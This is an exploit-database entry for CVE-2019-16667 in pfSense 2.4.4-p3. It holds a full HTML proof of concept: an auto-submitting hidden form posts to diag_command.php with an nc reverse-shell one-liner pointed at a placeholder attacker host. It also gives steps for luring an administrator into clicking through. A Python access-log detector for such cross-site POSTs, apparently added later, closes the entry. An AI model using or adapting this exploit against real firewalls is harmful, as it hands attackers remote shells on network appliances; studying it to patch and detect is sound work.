Vulnerability source
https://cxsecurity.com/issue/WLB-2020070151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-1268
# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
# Date: 2019-09-27
# Exploit Author: ghost_fh
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://www.pfsense.org/download/index.html?section=downloads
# Version: Till 2.4.4-p3
# Tested on: freebsd
# CVE : CVE-2019-16667
# Vulnerability Description :- The pfSense firewall is vulnerable to RCE
# chained with CSRF because it uses the `csrf magic` library, which allows tampering
# with the CSRF token values submitted when processing form requests. Due to
# this flaw, an attacker can exploit this vulnerability by crafting a new page
# that contains attacker-controlled input such as a "reverse shell" (eg:
# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
# >/tmp/f`token value) in the form and enticing the victims to click
# on the crafted link via social engineering methods. Once the victim clicks
# on the link (try again button in this case), the attacker can take
# lateral control of the victim's machine and malicious actions can be
# performed on the victim's behalf.
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST">
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="dlPath" value="">
<input type=hidden name="txtPHPCommand" value="">
<input type="hidden" name="submit" value="EXEC">
</form>
</body>
</html>
# Create a malicious page containing the above values; once the user clicks on the malicious link,
# he will be redirected to the https://pfsense_ip/diag_command.php page.
# The victim will be greeted with the "Try again" button.
# Once the victim clicks on the "Try again" button, you will be greeted with a reverse shell of the victim.
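A detection sketch for the request pattern the PoC above produces, added here as an example and not part of the original advisory or of pfSense: it flags POSTs to `/diag_command.php` whose Referer is absent or points outside the firewall GUI. The combined access-log format, the host names in `FIREWALL_HOSTS` and the function name `find_cross_site_posts` are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption: the web GUI's access log uses the common "combined" format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)
# Hosts under which the firewall GUI is legitimately reached (placeholder values).
FIREWALL_HOSTS = {"pfsense.example.internal", "192.0.2.1"}
SENSITIVE_PATHS = {"/diag_command.php"}  # endpoint the PoC form posts to


def _host(url):
    """Hostname of a Referer value, or None if absent or malformed."""
    if url in ("", "-"):
        return None
    try:
        return urlsplit(url).hostname
    except ValueError:  # malformed Referer: treat as not our own GUI
        return None


def find_cross_site_posts(lines, own_hosts=FIREWALL_HOSTS):
    """Return (timestamp, client_ip, path, referer) for suspicious POSTs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path not in SENSITIVE_PATHS:
            continue
        # A submission made from the GUI normally carries a Referer naming the GUI.
        if _host(m["referer"]) not in own_hosts:
            hits.append((m["ts"], m["ip"], path, m["referer"]))
    return hits


# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '192.0.2.50 - - [27/Sep/2019:10:00:01 +0000] "GET /diag_command.php HTTP/1.1" 200 5120 "https://192.0.2.1/index.php" "Mozilla/5.0"',
    '192.0.2.50 - - [27/Sep/2019:10:00:09 +0000] "POST /diag_command.php HTTP/1.1" 200 5300 "https://192.0.2.1/diag_command.php" "Mozilla/5.0"',
    '192.0.2.50 - - [27/Sep/2019:10:04:30 +0000] "POST /diag_command.php HTTP/1.1" 200 900 "https://news.example.net/offer.html" "Mozilla/5.0"',
    '192.0.2.50 - - [27/Sep/2019:10:07:12 +0000] "POST /diag_command.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [27/Sep/2019:10:08:00 +0000] "POST /system.php HTTP/1.1" 200 700 "https://news.example.net/offer.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ts, ip, path, referer in find_cross_site_posts(SAMPLE_LOG):
        print(f"{ts} {ip} POST {path} referer={referer!r}")
```

Only the initial cross-site POST is expected to match; the resubmission from the "Try again" page originates from the GUI itself.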
Source: pastebin.com
Link: https://pastebin.com/TEJdu9LN
Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-16667